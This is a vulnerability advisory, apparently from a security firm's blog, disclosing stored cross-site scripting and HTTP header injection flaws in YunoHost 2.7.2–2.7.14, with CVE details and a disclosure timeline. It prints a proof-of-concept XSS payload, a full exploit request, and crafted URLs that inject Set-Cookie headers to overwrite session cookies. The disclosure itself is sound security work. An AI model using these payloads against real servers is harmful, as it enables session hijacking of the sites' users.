YunoHost 2.7.2 to 2.7.14 - Multiple Vulnerabilities

By:
Gauge showing high severity reading

Share

Product Description

YunoHost is an application that is used to manage applications hosted on a Linux server. Additionally, it allows the user to manage the entire Linux system, including installed services, firewall rules, and system updates. The application’s official website is yunohost.org. Version 2.7.2 was released on August 22, 2017, and version 2.7.14 was released on June 28, 2018.

Vulnerabilities List

Two vulnerabilities were identified within the YunoHost application:

These vulnerabilities are described in the following sections.

Affected Version

Versions between 2.7.2 and 2.7.14

Solution

TBD

Stored Cross-site Scripting

The YunoHost application is affected by two cross-site scripting (XSS) vulnerabilities that are stored within the user profile. These vulnerabilities allow the execution of a JavaScript payload inside the victim’s browser.

Vulnerability Details

CVE ID: CVE-2018-11348

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 8.8

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Two XSS vulnerabilities are located in the user profile page of the user panel within the YunoHost application. By injecting a JavaScript payload in the vulnerable parameter of the profile page, an attacker can manipulate a user’s session. The weak parameters are givenname or sn.

To demonstrate the attack, the following payload can be used for each parameter:

“ onfocus=”alert(document.cookie) a=”

The request below could be used to exploit the vulnerabilities:

POST /yunohost/sso/edit.html HTTP/1.1
Host: HOST
Cookie: SSOwAuthUser=USERNAME; SSOwAuthHash=HASHVALUE; SSOwAuthExpire=TIMESTAMP

givenName=user%22+onfocus%3D%22alert%28document.cookie%29+a%3D
%22&sn=user %22+onfocus%3D%22alert%28document.cookie%29+a%3D%22&mail=user%40test.com&mailalias%5B
%5D=root%40test.com&mailalias%5B%5D=admin%40test.com&mailalias%5B%5D=webmaster%40test.c
om&mailalias%5B%5D=postmaster%40test.com&mailalias%5B%5D=&maildrop%5B%5D=

HTTP Header Injection

The YunoHost application is affected by one HTTP header injection vulnerability. An attacker can exploit this vulnerability by one of the request parameters and injecting a malicious HTTP header in the response returned by the server This header could be used to set a cookie or overwrite HTTP header used to instruct the client browser to protect client data. Full exploitation requires the attacker to interact with the user and send them the malicious link. By combining the HTTP header injection vulnerability with the XSS vulnerability described above, an attacker could target the browser of the victim using a malicious JavaScript payload and exploit.

Vulnerability Details

CVE ID: CVE-2018-11347

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

The authentication page of the YunoHost application is vulnerable to injection. The attack could be performed using the following URL:

https://HOST/yunohost/sso/?r=%0aFAKEHTTPEADER:%20BADPARANTER

The vulnerability can be used to force a user to log into an infected account with the XSS described in the previous section. An attacker can send the following request to perform this attack:

https://HOST/yunohost/sso/?r=%0aSet-Cookie:%20SSOwAuthUser=jane;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%20Mounth%2
0Year%20HH:mm:ss%20TIMEZONE;;%20Secure%0aSet-Cookie:%20SSOwAuthHash=SESSIONCOOKIE;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%2
0Mounth%20Year%20HH:mm:ss%20TIMEZONE;;%20Secure%0aSet-Cookie:%20SSOwAuthExpire=TIMESTAMP;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%20M
ounth%20Year%20HH:mm:ss%20TIMEZONE;;%20Secure

In the request above, malicious Set-Cookie HTTP headers are sent to the user browser, overwriting valid session cookies.

Disclosure Timeline: 

  • 9/28/2017: Initial discovery in version 2.7.2
  • 7/6/2018: Vulnerabilities discovered in version 2.7.14
  • 10/30/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 

 

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

Florian nivette

About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.

More by Florian

Recommended Posts

You might be interested in these related posts.

Nov 01, 2024

A Brief Look at FortiJump (FortiManager CVE-2024-47575)

Jul 02, 2024

Traeger Grill D2 Wi-Fi Controller, Version 2.02.04

Jun 17, 2024

ExpressionEngine, Version 7.3.15

May 06, 2024

OOB Memory Read: Netscaler ADC and Gateway

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.